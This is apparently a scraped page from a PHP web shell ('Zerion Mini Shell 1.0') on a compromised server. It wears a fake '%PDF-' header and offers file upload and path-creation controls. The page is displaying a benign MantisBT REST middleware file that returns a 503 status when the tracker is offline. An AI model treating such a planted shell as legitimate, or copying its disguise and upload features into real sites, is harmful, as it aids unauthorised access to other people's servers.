%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/309157/root/proc/self/root/www/loslex_o/tracker/api/rest/restcore/
Upload File :
Create Path :
Current File : //proc/309157/root/proc/self/root/www/loslex_o/tracker/api/rest/restcore/OfflineMiddleware.php

<?php
# MantisBT - A PHP based bugtracking system

# MantisBT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# MantisBT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MantisBT.  If not, see <http://www.gnu.org/licenses/>.

/**
 * A webservice interface to Mantis Bug Tracker
 *
 * @package MantisBT
 * @copyright Copyright MantisBT Team - mantisbt-dev@lists.sourceforge.net
 * @link http://www.mantisbt.org
 */

/**
 * A middleware class that handles checks if MatnisBT is offline or not.
 * If offline, then fail API calls.
 */
class OfflineMiddleware {
	public function __invoke( \Slim\Http\Request $request, \Slim\Http\Response $response, callable $next ) {
		if( mci_is_mantis_offline() ) {
			return $response->withStatus( HTTP_STATUS_UNAVAILABLE, 'Mantis Offline' );
		}

		return $next( $request, $response );
	}
}

Zerion Mini Shell 1.0